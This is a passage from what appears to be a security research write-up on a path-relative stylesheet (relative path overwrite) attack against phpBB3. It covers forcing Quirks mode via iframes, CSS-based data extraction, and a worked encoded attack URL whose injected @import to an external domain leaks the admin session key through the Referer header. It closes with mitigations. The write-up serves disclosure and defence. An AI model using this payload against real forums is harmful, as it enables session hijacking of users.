and this page uses the following statement to import an external stylesheet:
The absence of a leading / indicates that the browser should interpret it relative to the current page’s folder. The web browser will calculate this folder (/phpBB3/) from the current URL, and grab the stylesheet from:
Fortunately for us, there is a way to trigger Quirks mode even when the page uses a modern doctype. Internet Explorer allows document modes to be inherited through iframes, so we can force any page to be loaded in Quirks mode by framing it*. phpBB3 doesn’t use any effective anti-framing measures, so we can proceed using this attack route. The following HTML uses a meta tag to ensure Quirks mode is activated, then loads the target page:
<link rel="alternate" type="application/atom+xml" title="Feed - yourdomain.com" href="http://example.com/phpBB3/search.php/
- Extracting page source and stealing CSRF tokens using CSS selectors. This attack is demonstrated by sirdarckcat at http://eaea.sirdarckcat.net/cssar/v2/, and can be adapted to work on hidden inputs.
- Extract page source at high speed by using http://html5sec.org/webkit/test. See http://www.syssec.rub.de/media/emma/veroeffentlichungen/2012/08/16/scriptlessAttacks-ccs2012.pdf and http://channel9.msdn.com/Events/Blue-Hat-Security-Briefings/BlueHat-Security-Briefings-Fall-2012-Sessions/BH1203 for further details.
- Extracting the page’s URL using http://html5sec.org/cssession
- If the stars are aligned, and you have two injection points on the same line with some sensitive information between, you might be able to extract it in a single request with http://scarybeastsecurity.blogspot.co.uk/2009/12/generic-cross-browser-cross-domain.html (The technique described there no longer works cross-domain, but still works same-domain).
- If the application appends sensitive information to the stylesheet URL, exfiltrate it to an external domain by using @import and watching the Referer header
The last approach might sound quite implausible, but that’s exactly what phpBB3 does. Whenever a logged in user visits
the server redirects them to
where ‘sid’ is their session key, fresh out their cookie. This key is then appended to a path relative stylesheet imports:
The attack URL is a bit messy because I had to double-URL encode it to get through the initial redirect. Also, the redirect encoded and filtered spaces and newlines, so I replaced them with tab and ‘form feed’ characters instead respectively, courtesy of http://html5sec.org/#45.
- The meta statement triggers Quirks mode.
- The site loads the following URL in an iframe: http://192.168.181.149/phpBB3/adm/index.php/%250C%257B%257D%250C%40
- This results in a redirect to: http://192.168.181.149/phpBB3/adm/index.php/%0C%7B%7D%0C@import%09%27
- The users’ browser renders this page and tries to load the following HTML page as a stylesheet: http://192.168.181.149/phpBB3/adm/index.php/%0C%7B%7D%0C@import%09%27
- When processing this page, the CSS parser reaches and executes the following statement injected via the URL: @import '//portswigger.net/css/ps.css'
The root problem can be resolved by not using path-relative links on systems with flexible path-handling. Finally, the vulnerability can be mitigated using the following best practise steps, which may look awfully familiar:
- Set the server header X-Frame-Options: deny on all pages
- Set the server header X-Content-Type-Options: nosniff on all pages
- Set a modern doctype (eg: <!doctype html>) on all pages